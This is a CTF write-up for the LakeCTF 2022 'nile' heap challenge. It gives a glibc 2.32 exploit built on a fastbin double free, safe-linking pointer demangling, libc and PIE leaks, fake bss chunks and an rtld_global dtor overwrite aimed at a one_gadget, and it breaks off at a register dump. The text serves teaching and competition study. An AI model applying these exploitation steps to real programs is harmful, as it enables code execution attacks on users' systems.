LakeCTF Qualifications 2022 - nile
When I wrote this challenge, glibc 2.32 was the latest and greatest, so I made sure I could exploit this on 2.27, 2.29, 2.31 and 2.32. I only expect you to do the 2.32 version ;)
nc chall.polygl0ts.ch 3800
Team: Super Guesser
Attachment: nile libc-2.32.so Dockerfile ld-2.32.so xpl.py
Welcome to Nile, the newest and most advanced publishing and selling platform known to mankind.
Would you like to:
1. Add a fake endorsement
2. Add a brief description
3. Review your current entries
4. Remove some data
5. Upgrade your plan
6. quit
>
nile was kind of your regular heap note challenge, where you can add, view and free chunks. But it had some twists, which made it quite hard to exploit.
Adding a fake endorsement creates 0x30 chunks, and adding a description creates 0x50 chunks. All chunks are allocated via calloc, so tcache cannot be abused, because calloc will not serve chunks from tcache. So the easy path via tcache poisoning is not feasible :(
Also, since the challenge is using libc-2.32, we have to keep in mind that we cannot directly use double frees, since tcache will check for that. But we can get around this by first freeing 7 chunks regularly into tcache. After tcache is filled, the following frees will be handled by the fastbins in main_arena, which enables us to use double free again.
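The free order used here can be illustrated with a toy model of the two checks involved. This is only a sketch, not glibc code: the class ToyBins and its two lists are made up for illustration, and it models nothing but the tcache duplicate check and the fastbin "head of the bin" comparison.

```python
TCACHE_COUNT = 7  # default number of chunks tcache keeps per size class


class ToyBins:
    """Toy model (an assumption, not glibc source) of free() for one chunk size."""

    def __init__(self):
        self.tcache = []   # chunks parked in tcache
        self.fastbin = []  # chunks in the fastbin, last element is the head

    def free(self, chunk):
        # tcache notices a chunk it already holds
        if chunk in self.tcache:
            raise RuntimeError("free(): double free detected in tcache 2")
        if len(self.tcache) < TCACHE_COUNT:
            self.tcache.append(chunk)
            return
        # the fastbin check only compares against the current head
        if self.fastbin and self.fastbin[-1] == chunk:
            raise RuntimeError("double free or corruption (fasttop)")
        self.fastbin.append(chunk)


bins = ToyBins()
for filler in range(7):           # fill tcache first
    bins.free("filler%d" % filler)

bins.free("A")
bins.free("B")                    # B becomes the head and hides A
bins.free("A")                    # accepted: A is now in the bin twice
print(bins.fastbin)
```

Freeing A twice in a row would hit the head comparison, which is why another chunk is freed in between.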
With this, we can start leaking heap values (again, libc-2.32 is used, so heap addresses will be mangled).
def exploit(r):
    r.recvuntil("> ")

    # create initial chunks
    for i in range(12):
        adddesc(0x20-8, "A"*(0x20-8))

    # fill up tcache
    for i in range(7):
        remove(i)

    # upgrade to be able to allocate more chunks
    upgrade()

    # double free first chunk
    remove(0)
    remove(1)
    remove(0)

    # add a new chunk (0 and 11 will now point to the same chunk)
    adddesc(0x20-8, "A") # 11

    # free chunk 0
    remove(0)

    # leak heap value from chunk 11 (which is now freed)
    LEAK = u64(review()[:-1].ljust(8, "\x00"))
    log.info("LEAK : %s" % hex(LEAK))
One thing to note for this… When developing the exploit locally with ASLR disabled, the leak will look wrong.
$ python xpl.py
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process './nile': pid 53115
[53115]
[*] Paused (press any to continue)
[*] LEAK : 0x835d
This happens, because the mangled heap address will contain null bytes.
0x55555555d5b0: 0x0000000000000000 0x0000000000000051
0x55555555d5c0: 0x000055500000835d 0x0000000000000000 <= mangled ptr
0x55555555d5d0: 0x0000000000000000 0x0000000000000000
0x55555555d5e0: 0x0000000000000000 0x0000000000000000
0x55555555d5f0: 0x0000000000000000 0x0000000000000000
0x55555555d600: 0x0000000000000000 0x0000000000000051
Though with ASLR enabled, it will not contain any null bytes most of the time and can just be read this way.
kileak@beast:~/ctf/lake/nilework$ python xpl.py
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process './nile': pid 53219
[53219]
[*] Paused (press any to continue)
[*] LEAK : 0x55681185831f
But while developing the exploit, we don’t want to activate ASLR. Since we know that the leak will work correctly remotely, we can just add a small fix to let our exploit also work locally with ASLR deactivated.
# leak heap value from chunk 11 (which is now freed)
with open("/proc/sys/kernel/randomize_va_space", "r") as f:
    state = f.read()[0]
print(hexdump(state))
ASLR = state == "2"
if LOCAL and not ASLR:
    LEAK = 0x000055500000835d # 0x000055500000811d
else:
    LEAK = u64(review()[:-1].ljust(8, "\x00"))
log.info("LEAK : %s" % hex(LEAK))
So, when we’re running locally and ASLR is disabled, we just set the value it “should” be, and from here on we can debug the exploit the same way with and without ASLR.
$ python xpl.py
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process './nile': pid 54387
[54387]
[*] Paused (press any to continue)
[*] LEAK : 0x55500000835d
This will give us a mangled heap pointer, which can luckily be reversed to get to the real heap address.
def demangle(obfus_ptr):
    o2 = (obfus_ptr >> 12) ^ obfus_ptr
    return (o2 >> 24) ^ o2
...
HEAP = demangle(LEAK)
$ python xpl.py
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process './nile': pid 54785
[54785]
[*] Paused (press any to continue)
[*] LEAK : 0x55500000835d
[*] HEAP : 0x55555555d600
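To see why the demangling works, here is a small round trip using the values from the dumps in this writeup. It is a sketch under one assumption: the stored pointer and the location it is stored at lie on the same 4 KiB page, so both share the same upper bits. The helper name protect_ptr is chosen for illustration (it mirrors the safe-linking idea of glibc 2.32, XORing the pointer with its storage address shifted right by 12).

```python
def protect_ptr(pos, ptr):
    # safe-linking: stored value = (address of the fd field >> 12) ^ real pointer
    return (pos >> 12) ^ ptr


def demangle(obfus_ptr):
    # undo the XOR without knowing pos, valid when pos and ptr share a page
    o2 = (obfus_ptr >> 12) ^ obfus_ptr
    return (o2 >> 24) ^ o2


fd_field = 0x55555555d5c0     # where the fd pointer is stored (from the dump)
next_chunk = 0x55555555d600   # where it really points

stored = protect_ptr(fd_field, next_chunk)
print(hex(stored))            # the value that review() leaks
print(hex(demangle(stored)))  # the recovered heap address
```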
This wasn’t too hard, but from here the real pain began (also not having a debug version of libc/ld at hand didn’t make it any better).
We have a double free, but since it’s handled via calloc, the chunks have to be 16 byte aligned and they need to have a correct size (0x50 or 0x30), so we cannot just allocate anywhere…
But let’s start with the obvious things first. We need a libc leak.
For this, it would be useful to free a chunk that will not be handled as a fastbin, but we can only create 0x30 and 0x50 chunks… Except when doing an upgrade: This will allocate a 0xc00 chunk on the heap, in which the chunks of the professional plan will be stored.
If we could free this chunk, we would get some main_arena pointers onto the heap, which we might be able to leak afterwards, so let’s start with that.
While preparing the previous heap leak, I also triggered the upgrade functionality. This was done on purpose, since after the leak we still have a double freed pointer in main_arena and have also already allocated the 0xc00 chunk for the professional plan on the heap.
main_arena
0x7ffff7fc19f0: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a00: 0x0000000000000000 0x0000000000000001
0x7ffff7fc1a10: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a20: 0x0000000000000000 0x000055555555d5b0 <= 0x50 free chunk
0x7ffff7fc1a30: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a40: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a50: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a60: 0x000055555555e260 0x0000000000000000
0x7ffff7fc1a70: 0x00007ffff7fc1a60 0x00007ffff7fc1a60
0x7ffff7fc1a80: 0x00007ffff7fc1a70 0x00007ffff7fc1a70
gef➤ x/30gx 0x000055555555d5b0
0x55555555d5b0: 0x0000000000000000 0x0000000000000051
0x55555555d5c0: 0x000055500000835d 0x0000000000000000
0x55555555d5d0: 0x0000000000000000 0x0000000000000000
0x55555555d5e0: 0x0000000000000000 0x0000000000000000
0x000055500000835d ^ 0x55555555d = 0x55555555d600
gef➤ x/30gx 0x000055555555d600
0x55555555d600: 0x0000000000000000 0x0000000000000051
0x55555555d610: 0x00005550000080ed 0x4141414141414141
0x55555555d620: 0x4141414141414141 0x0000000000000000
0x55555555d630: 0x0000000000000000 0x0000000000000000
0x55555555d640: 0x0000000000000000 0x0000000000000000
0x55555555d650: 0x0000000000000000 0x0000000000000c11 <= insert fake chunk here
0x55555555d660: 0x000055555555d5c0 0x0000000000000040 <= pro plan chunk
0x55555555d670: 0x0000000000000000 0x0000000000000000
0x00005550000080ed ^ 0x55555555d = 0x55555555d5b0
We’ll use the next allocation to overwrite the FD pointer of the first chunk with a pointer pointing to the pro_plan chunk.
After that we’ll allocate the next chunk (which is directly above the pro plan chunk) and now put a valid chunk size above the pro_plan chunk.
The next allocation will then get our fake chunk on top of the pro plan, and since we put a valid chunk size there, it should succeed.
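The arithmetic behind these steps can be checked offline. The sketch below uses only the standard library; the local p64 helper is a stand-in for the pwntools function of the same name, and the addresses are the ones from the ASLR-disabled dumps in this writeup.

```python
import struct


def p64(value):
    # little-endian 8-byte packing, stand-in for pwntools' p64
    return struct.pack("<Q", value)


HEAP = 0x55555555d600          # demangled heap leak
GUARD = HEAP >> 12             # safe-linking XOR key for this heap page

fake_chunk = HEAP + 0x40       # fake 0x50 chunk right above the pro plan chunk
mangled_fd = fake_chunk ^ GUARD

# seven zero qwords, then only the low byte of the size (0x51)
payload = p64(0) * 7 + p64(0x51)[:1]
user_data = HEAP + 0x10        # data of the chunk at HEAP starts after its header
size_byte_addr = user_data + len(payload) - 1

print(hex(mangled_fd))
print(hex(size_byte_addr))
```

The last payload byte lands on the size field of the fake chunk (fake_chunk + 8), which is what lets the following 0x50 allocation pass the size check.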
GUARD = HEAP >> 12
log.info("HEAP guard : %s" % hex(GUARD))
# overwrite FD of double freed chunk with pointer above pro plan chunk
adddesc(0x20-8, p64(HEAP+0x40^GUARD))
# create size for fake 0x50 chunk before pro_plan chunk
payload = p64(0) + p64(0)
payload += p64(0) + p64(0)
payload += p64(0) + p64(0)
payload += p64(0) + p64(0x51)[:1]
adddesc(len(payload), payload)
# get fake FD into main_arena
adddesc(0x20-8, "C"*(0x20-8))
adddesc(0x20-8, p64(HEAP+0x40^GUARD))
0x55555555d5b0: 0x0000000000000000 0x0000000000000051
0x55555555d5c0: 0x000055500000831d 0x0000000000000000 <= overwritten FD
0x55555555d5d0: 0x0000000000000000 0x0000000000000000
0x55555555d5e0: 0x0000000000000000 0x0000000000000000
0x55555555d5f0: 0x0000000000000000 0x0000000000000000
0x55555555d600: 0x0000000000000000 0x0000000000000051
0x000055500000831d ^ 0x55555555d = 0x55555555d640 (points above pro plan chunk)
adddesc(len(payload), payload)
0x55555555d600: 0x0000000000000000 0x0000000000000051
0x55555555d610: 0x0000000000000000 0x0000000000000000
0x55555555d620: 0x0000000000000000 0x0000000000000000
0x55555555d630: 0x0000000000000000 0x0000000000000000
0x55555555d640: 0x0000000000000000 0x0000000000000051 <= fake chunk size
0x55555555d650: 0x0000000000000000 0x0000000000000c11
0x55555555d660: 0x000055555555d5c0 0x0000000000000040
adddesc(0x20-8, "C"*(0x20-8))
0x7ffff7fc19f0: 0x0000000000000000 0x0000000000000000 <= main_arena
0x7ffff7fc1a00: 0x0000000000000000 0x0000000000000001
0x7ffff7fc1a10: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a20: 0x0000000000000000 0x000055555555d640 <= PTR to our fake chunk
0x7ffff7fc1a30: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a40: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a50: 0x0000000000000000 0x0000000000000000
The next 0x50 allocation will thus serve our fake chunk, with which we can overwrite the first bytes of the pro_plan chunk.
# allocate fake chunk and overwrite pro_plan chunk
payload = p64(0) + p64(0xc11)
payload += p64(HEAP+0x60) + p64(0x40) # chunk ptr / size
payload += p64(0x0) + p64(HEAP+0x60) # is_freed / chunk_ptr
payload += p64(0x40) # size
adddesc(len(payload), payload)
This will put a pointer to the pro_plan itself into the first pro chunk slot, which we could now free to get a free bin on the heap, but this will trigger malloc_consolidate, which will notice that our chunks are totally messed up and abort.
malloc_consolidate(): unaligned fastbin chunk detected
But luckily, we can get around this, by creating a dummy endorsement, which will fix this for us.
# create endorsement to avoid crash in malloc_consolidate
addfake(0x20-8, "A")
# free pro_plan chunk (free unsorted bin now)
remove(3)
0x55555555d640: 0x0000000000000000 0x0000000000000051
0x55555555d650: 0x0000000000000000 0x0000000000000c11
0x55555555d660: 0x00007ffff7fc1a60 0x00007ffff7fc1a60
0x55555555d670: 0x0000000000000000 0x0000000000000000
0x55555555d680: 0x0000000000000000 0x0000000000000001
0x55555555d690: 0x0000000000000000 0x0000000000000040
0x55555555d6a0: 0x0000000000000000 0x000055555555d5c0
0x55555555d6b0: 0x0000000000000040 0x0000000000000000
0x55555555d6c0: 0x000055555555d650 0x0000000000000040
0x55555555d6d0: 0x0000000000000000 0x000055555555e270
0x55555555d6e0: 0x0000000000000020 0x0000000000000000
Ok, so finally some libc pointers on the heap, now we’ll just need to get them “reviewable”. We have to keep in mind that any allocation will now be served from the freed chunk, thus overwriting the pro plan entries themselves and also moving the libc addresses down the heap.
# allocate chunks pointing to freed unsorted bin address (so they can be reviewed)
payload = p64(HEAP+0x120) + p64(0x0)
payload += p64(0)
addfake(len(payload), payload)
addfake(len(payload), payload)
addfake(len(payload), payload)
addfake(len(payload), payload)
Allocating four 0x30 chunks from the freed unsorted bin chunk, each holding a pointer to where the main_arena pointers will be after those allocations, will result in a valid pro_plan.
0x55555555d650: 0x0000000000000000 0x0000000000000031
0x55555555d660: 0x000055555555d720 0x0000000000000000 <= slot 1 buffer / slot 1 size
0x55555555d670: 0x0000000000000000 0x0000000000000000 <= slot 1 freed / slot 2 buffer
0x55555555d680: 0x0000000000000000 0x0000000000000031 <= slot 2 size / slot 2 freed
0x55555555d690: 0x000055555555d720 0x0000000000000000 <= slot 3 buffer / slot 3 size
0x55555555d6a0: 0x0000000000000000 0x0000000000000000 <= slot 3 freed / slot 4 buffer
0x55555555d6b0: 0x0000000000000000 0x0000000000000031 <= slot 4 size / slot 4 freed
0x55555555d6c0: 0x000055555555d720 0x0000000000000000 <= slot 5 buffer / slot 5 size
0x55555555d6d0: 0x0000000000000000 0x0000000000000000 <= slot 5 freed / slot 6 buffer
0x55555555d6e0: 0x0000000000000000 0x0000000000000031 <= slot 6 size / slot 6 freed
0x55555555d6f0: 0x000055555555d720 0x0000000000000000 <= slot 7 buffer / slot 7 size
0x55555555d700: 0x0000000000000000 0x0000000000000000 <= slot 7 freed
0x55555555d710: 0x0000000000000000 0x0000000000000b51
0x55555555d720: 0x00007ffff7fc1a60 0x00007ffff7fc1a60 <= main_arena pointers
Though every second slot has an invalid buffer, this is not an issue, since the is_freed part of it contains 0x31, so it will be skipped in review (as it will interpret those as freed notes) and we can just leak the other slots with valid pointers.
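The slot layout can be decoded mechanically from the dump. The sketch below assumes what the annotations suggest: each pro plan slot is three qwords (buffer, size, is_freed), and review skips every slot whose is_freed field is non-zero. The qword list is copied from the memory starting at 0x55555555d660.

```python
SLOT_QWORDS = 3  # buffer, size, is_freed

# 21 qwords starting at 0x55555555d660, taken from the heap dump
dump = [
    0x55555555d720, 0, 0,   0, 0, 0x31,
    0x55555555d720, 0, 0,   0, 0, 0x31,
    0x55555555d720, 0, 0,   0, 0, 0x31,
    0x55555555d720, 0, 0,
]

slots = [tuple(dump[i:i + SLOT_QWORDS]) for i in range(0, len(dump), SLOT_QWORDS)]

# slots that review would print (assumption: is_freed == 0 means "in use")
reviewable = [n for n, (buf, size, freed) in enumerate(slots, 1) if freed == 0]

for n, (buf, size, freed) in enumerate(slots, 1):
    print("slot %d: buffer=%#x size=%#x is_freed=%#x" % (n, buf, size, freed))
print(reviewable)
```

Every odd slot points at the main_arena pointers, while the 0x31 chunk headers conveniently mark the even slots as freed.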
# leak main arena ptr from review
LEAK = u64(review()[:6].ljust(8, "\x00"))
libc.address = LEAK - 0x1c2a60
log.info("LIBC leak : %s" % hex(LEAK))
log.info("LIBC : %s" % hex(libc.address))
[*] LIBC leak : 0x7ffff7fc1a60
[*] LIBC : 0x7ffff7dff000
Now, how to get rip control from here on?
First, I checked if there were any valid chunk sizes (16 byte-aligned) in libc or ld, which could help us to overwrite something useful (I was already thinking in the direction of rtld_global there, since with aligned chunks, I didn’t see any feasible way to overwrite malloc_hook or free_hook).
But no chance, I didn’t find any region that contained a value with which we could allocate a 0x50 or 0x30 chunk.
So, after a lot of failed tries, I checked bss to see if we could somehow do something there.
0x555555558000 <free@got.plt>: 0x00007ffff7e8b2f0 0x0000555555555046
0x555555558010 <puts@got.plt>: 0x00007ffff7e76380 0x0000555555555066
0x555555558020 <printf@got.plt>: 0x00007ffff7e57b10 0x00007ffff7eefeb0
0x555555558030 <calloc@got.plt>: 0x00007ffff7e8ba50 0x00007ffff7e7c5e0
0x555555558040 <setvbuf@got.plt>: 0x00007ffff7e76aa0 0x00007ffff7e58f60
0x555555558050: 0x0000000000000000 0x0000555555558058
0x555555558060 <stdout@GLIBC_2.2.5>: 0x00007ffff7fc2520 0x0000000000000000
0x555555558070 <stdin@GLIBC_2.2.5>: 0x00007ffff7fc1800 0x0000000000000000
0x555555558080 <stderr@GLIBC_2.2.5>: 0x00007ffff7fc2440 0x0000000000000000
0x555555558090: 0x0000000000000000 0x0000000000000000
0x5555555580a0 <free_plan>: 0x0000000000000002 0x0000000000000002
0x5555555580b0 <free_plan+16>: 0x00005555555581d0 0x0000000000000000
0x5555555580c0 <pro_plan>: 0x0000000000000080 0x000000000000000a <= max pro bound / current pro count
0x5555555580d0 <pro_plan+16>: 0x000055555555d660 0x0000000000000000 <= pro plan chunk
0x5555555580e0 <free_plan_data>: 0x000055555555d2a0 0x0000000000000000
Also no good chunk sizes there to, for example, attack the got table… But can we create a fake chunk anywhere in bss?
Well, we kind of control the current pro count by adding more chunks, so we could create a valid chunk size there, and allocate a chunk overlapping the pointer to the pro_plan itself.
This will not allow us to “directly” write data anywhere, but we could let it point to a table structure (like dtors). Creating chunks in the pro plan could then potentially overwrite a table entry with a heap chunk, from which _dl_fini would then fetch the function to execute, which could lead to rip control.
But this would also mean that we need to be able to do a clean exit, since the challenge will call cleanup before exiting, which will try to free all currently allocated chunks (which will most likely fail after the whole mess we created by now on the heap).
We’ll also need to find a way around that, but let’s keep that for later.
First we’ll need a leak of the elf region:
# overwrite an allocated chunk with pointer to pie address
payload = p64(libc.address+0x1c1d80) + p64(0x0)
payload += p64(0) + p64(0x51)[:1] # fix chunksize
addfake(len(payload), payload)
# leak pie address from review
PIE = u64(review().split("\n")[4].ljust(8, "\x00"))
log.info("PIE : %s" % hex(PIE))
This will create another entry in our freed pro plan, with its buffer pointing to a libc address that contains a pointer to our elf.
But at the current state, the heap is such a mess that almost every allocation will go haywire. Thus we also need to put a valid chunk size in our payload to fix the follow-up fastbin. Otherwise malloc will notice the invalid fastbin and crash.
Allocations and frees really start to become a pain from here on…
[*] PIE : 0x555555558080
With this, we successfully leaked an address pointing to bss, so we can now prepare putting a fake chunk there.
But trying to use the double free to allocate a chunk onto bss now triggered malloc_consolidate again, and it checked the unsorted bin on the heap, which… well… wasn’t linked correctly anymore, since we were overwriting it with pro plan chunks.
So, let’s first take a detour to repair this…
# double free
remove(0)
remove(1)
remove(0)
# point fd to unsorted bin
adddesc(0x10, p64((HEAP+0x130)^GUARD))
adddesc(0x10, p64(0xdeadbeef))
adddesc(0x10, p64(0xdeadbeef))
# fix unsorted bin pointers
payload = p64(0) + p64(0x21)
payload += p64(libc.address+0x1c2a60) + p64(libc.address+0x1c2a60)
payload += p64(0x20) + p64(0x20)
adddesc(len(payload), payload)
We use the double free again to allocate a fake chunk overlapping the bin, and then with the last allocation overwrite the size of the bin with 0x20 and put valid main_arena pointers into it. By resizing it, we won’t have to bother with it anymore, since we’ll never do an allocation that could fit into a 0x20 bin, so hopefully, we’re good now.
Now, we can go on with allocating into bss, by first increasing the pro plan counter, so that when our final allocation happens, we’ll have a 0x50 size in it.
# increase pro plan counter
for i in range(61):
    addfake(10, "A")
# double free
remove(0)
remove(1)
remove(0)
# overwrite FD with pointer to pro_plan address
adddesc(0x10, p64((PIE+0x40)^GUARD))
adddesc(0x10, p64(0xdeadbeef))
adddesc(0x10, p64(0xdeadbeef))
bss
0x5555555580b0 <free_plan+16>: 0x00005555555581d0 0x0000000000000000
0x5555555580c0 <pro_plan>: 0x0000000000000080 0x000000000000004f <= pro plan counter
0x5555555580d0 <pro_plan+16>: 0x000055555555d660 0x0000000000000000
0x5555555580e0 <free_plan_data>: 0x000055555555d2a0 0x0000000000000000
main_arena
0x7ffff7fc1a00: 0x0000000000000000 0x0000000000000001
0x7ffff7fc1a10: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a20: 0x0000000000000000 0x00005555555580c0 <= 0x50 fastbin pointing to pro_plan chunk
0x7ffff7fc1a30: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a40: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a50: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1a60: 0x000055555555ee00 0x000055555555d740
Looking good. The next allocation will increase the pro plan counter to 0x50 and then allocate the next chunk at 0x00005555555580c0, which will succeed, since we have a valid chunk size there now.
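Why the counter has to reach 0x50 first can be sketched with the size check that malloc applies when it takes a chunk from a fastbin. The two helpers mirror the glibc macros chunksize and fastbin_index for 64-bit; the function passes_fastbin_check is a made-up name for illustration and ignores the other checks (such as alignment).

```python
def chunksize(size_field):
    # strip the three flag bits from the size field
    return size_field & ~0x7


def fastbin_index(size):
    # 64-bit variant: 0x20 -> 0, 0x30 -> 1, 0x40 -> 2, 0x50 -> 3
    return (size >> 4) - 2


def passes_fastbin_check(size_field, requested_chunk_size):
    # the chunk pulled from the bin must belong to the bin it was found in
    return fastbin_index(chunksize(size_field)) == fastbin_index(requested_chunk_size)


# the pro plan counter sits where the size field of the fake chunk would be
print(passes_fastbin_check(0x4f, 0x50))  # counter before the increment
print(passes_fastbin_check(0x50, 0x50))  # counter after the increment
```

With a counter of 0x4f the masked size is 0x48, which maps to the 0x40 bin, so the allocation would abort. Only once the counter is incremented to 0x50 does the fake chunk look like it belongs in the 0x50 fastbin.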
So, with the next chunk, we’ll be able to overwrite the pro_plan pointer itself. Keep in mind that we’ll not be able to write arbitrary data there, but we’ll overwrite the target region with pointers to our heap chunks. That’s why I went for rtld_global.
After some experimentation (aka debugging the hell out of _dl_fini), the following region looked good:
0x7ffff7ffe1d0: 0x0000000000000000 0x00007ffff7ffe728
0x7ffff7ffe1e0: 0x0000000000000000 0x000055555555c010
0x7ffff7ffe1f0: 0x000055555555c0f0 0x000055555555c0e0
0x7ffff7ffe200: 0x0000000000000000 0x000055555555c090
0x7ffff7ffe210: 0x000055555555c0a0 0x000055555555c120
0x7ffff7ffe220: 0x000055555555c130 0x000055555555c140
0x7ffff7ffe230: 0x000055555555c0b0 0x000055555555c0c0
0x7ffff7ffe240: 0x000055555555c020 0x000055555555c030
We have to keep in mind that we have already allocated 0x50 chunks and that every slot takes 0x18 bytes (chunk, size, is_freed), so when overwriting the pro_plan pointer, we want to point it to dest_address-(0x50*0x18), so that the next allocations will be written to dest_address.
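The offset calculation can be written down as a tiny helper. This is a sketch with the ASLR-disabled addresses from the dumps; slot_addr is a hypothetical name, and the 0x18 slot size is taken from the chunk / size / is_freed layout visible in the dumps.

```python
SLOT_SIZE = 0x18  # chunk pointer, size, is_freed


def slot_addr(plan_base, index):
    # address at which the plan entry with the given index is stored
    return plan_base + index * SLOT_SIZE


dest_address = 0x7ffff7ffe1d0   # region in ld that should receive our entries
already_allocated = 0x50        # current pro plan counter

target = dest_address - already_allocated * SLOT_SIZE
print(hex(target))

# the next entries land exactly on the destination and right after it
print(hex(slot_addr(target, already_allocated)))
print(hex(slot_addr(target, already_allocated + 1)))
```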
We’ll first start putting some placeholder chunks there, which will be needed later (this is the result of hours of fiddling around in ld, so it’s a bit hard to explain in the right order, but should become clearer later on).
if LOCAL and not ASLR:
    LD = libc.address + 0x1d1000
else:
    LD = libc.address + 0x1cb000
RTLD = LD + 0x2e1d0
TARGET = RTLD-(0x50*24)
log.info("TARGET CHUNK : %s" % hex(RTLD))
# overwrite pro_plan address with address in rtld_global
payload = p64(TARGET)
adddesc(len(payload), payload)
addfake(20, "X"*19)
addfake(20, "Y"*19)
# put a gadget placeholder here for later
payload = "Z"*8 + p64(0xdeadbeef)
addfake(20, payload)
gef➤ x/30gx 0x7ffff7ffe1d0
0x7ffff7ffe1d0: 0x000055555555ee10 0x0000000000000020 chunk / size
0x7ffff7ffe1e0: 0x0000000000000000 0x000055555555ee40 is_freed / chunk
0x7ffff7ffe1f0: 0x0000000000000020 0x0000000000000000 size / is_freed
0x7ffff7ffe200: 0x000055555555ee70 0x0000000000000020 chunk / size
0x7ffff7ffe210: 0x0000000000000000 0x000055555555c120 is_freed
0x7ffff7ffe220: 0x000055555555c130 0x000055555555c140
0x7ffff7ffe230: 0x000055555555c0b0 0x000055555555c0c0
If we could exit now (getting through cleanup without a crash), this would just exit cleanly, since we haven’t overwritten any dtors by now. This was just to prepare some placeholders, which we’ll need later to be able to cleanly call one_gadget.
With the next allocations, we’ll overwrite a dtor pointer, which will be called later on, but we now also have to think about how we can survive cleanup in order to arrive at _dl_fini at all.
# double free
remove(0)
remove(1)
remove(0)
CALL = 0xfacebabe
# overwrite free fd with ptr to pro plan again
adddesc(0x10, p64((PIE+0x40)^GUARD))
adddesc(0x10, p64(0xdeadbeef)+p64(0xcafebabe))
adddesc(0x10, p64(0xdeadbeef)+p64(CALL)) # overwrite dtor entry
addfake(20, "A")
We again trigger a double free, so that we can control where the next allocations will go. We then overwrite the FD of the doubly freed chunk with a pointer to pro_plan again. Then we’ll allocate a dummy chunk to pull our fake fd into main_arena.
The last description will now overwrite a dtor pointer in rtld_global with 0xfacebabe, which could lead to code execution, if we make it there.
gef➤ x/30gx 0x7ffff7ffe1d0
0x7ffff7ffe1d0: 0x000055555555ee10 0x0000000000000020
0x7ffff7ffe1e0: 0x0000000000000000 0x000055555555ee40
0x7ffff7ffe1f0: 0x0000000000000020 0x0000000000000000
0x7ffff7ffe200: 0x000055555555ee70 0x0000000000000020
0x7ffff7ffe210: 0x0000000000000000 0x000055555555d5c0
0x7ffff7ffe220: 0x0000000000000040 0x0000000000000000
0x7ffff7ffe230: 0x000055555555d610 0x0000000000000040
0x7ffff7ffe240: 0x0000000000000000 0x000055555555d5c0 <= fake dtor chunk
0x7ffff7ffe250: 0x0000000000000040 0x0000000000000000
0x7ffff7ffe260: 0x000055555555eea0 0x0000000000000020
gef➤ x/30gx 0x000055555555d5c0
0x55555555d5c0: 0x00000000deadbeef 0x00000000facebabe <= dtor entry
0x55555555d5d0: 0x0000000000000000 0x0000000000000000
0x55555555d5e0: 0x0000000000000000 0x0000000000000000
0x55555555d5f0: 0x0000000000000000 0x0000000000000000
0x55555555d600: 0x0000000000000000 0x0000000000000051
The next allocation will again overwrite the pro_plan pointer, since we already placed a FD pointing there in main_arena.
We’ll now let it point directly above itself (subtracting the appropriate offset of already allocated chunks again).
# overwrite pro_plan with address above pro plan to overwrite allocated chunk count (to make free work)
TARGET = (PIE+0x38)-(0x58*24)
payload = p64(TARGET)
adddesc(len(payload), payload)
0x5555555580a0 <free_plan>: 0x0000000000000002 0x0000000000000002
0x5555555580b0 <free_plan+16>: 0x00005555555581d0 0x0000000000000000 <= next allocation will be stored here
0x5555555580c0 <pro_plan>: 0x0000000000000080 0x0000000000000058
0x5555555580d0 <pro_plan+16>: 0x0000555555557878 0x0000000000000000
By doing this, the next chunk allocation will write the buffer address to 0x5555555580b8, its size to 0x5555555580c0 and its is_freed value to 0x5555555580c8 (which happens to be the pro_plan counter).
This will effectively set the pro_plan counter to 0. Exactly what we need to fix cleanup.
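The overlap between the new slot and the plan header can be verified with a few lines of arithmetic. The sketch assumes the bss layout from the dumps (pro_plan at PIE+0x40, with the counter in its second qword) and the 0x18-byte slot layout; the field offset names are chosen for illustration.

```python
SLOT_SIZE = 24
BUFFER_OFF, SIZE_OFF, IS_FREED_OFF = 0, 8, 16

PIE = 0x555555558080            # leaked bss address
PRO_PLAN = PIE + 0x40           # 0x5555555580c0, max bound of the pro plan
COUNTER_ADDR = PRO_PLAN + 8     # 0x5555555580c8, current pro count

count = 0x58                    # entries allocated so far
TARGET = (PIE + 0x38) - count * SLOT_SIZE

slot = TARGET + count * SLOT_SIZE
buffer_addr = slot + BUFFER_OFF
size_addr = slot + SIZE_OFF
is_freed_addr = slot + IS_FREED_OFF

print(hex(TARGET))
print(hex(buffer_addr), hex(size_addr), hex(is_freed_addr))
```

A freshly added entry has is_freed set to 0, and that zero is written right onto the counter, so cleanup no longer believes there is anything to free.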
ONE_GADGET = libc.address + 0xcda5d
payload = "B"*0x10
payload += p64(ONE_GADGET)
addfake(31, payload)
0x5555555580b0 <free_plan+16>: 0x00005555555581d0 0x000055555555eed0
0x5555555580c0 <pro_plan>: 0x0000000000000020 0x0000000000000000 <= pro_plan_counter 0
0x5555555580d0 <pro_plan+16>: 0x0000555555557878 0x0000000000000000
Finally, time to exit and trigger our chain (and to fix it up).
Since cleanup is now executed nice and clean, we’ll end up in _dl_fini, running into our fake dtors there.
$rax : 0x000055555555d5c0 → 0x00000000deadbeef
$rbx : 0x00007ffff7ffd000 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$rcx : 0x0
$rdx : 0x0000555555557dd8 → 0x0000555555555170 → <__do_global_dtors_aux+0> endbr64
$rsp : 0x00007fffffffda80 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$rbp : 0x00007fffffffdaf0 → 0x0000000000000000
$rsi : 0x0
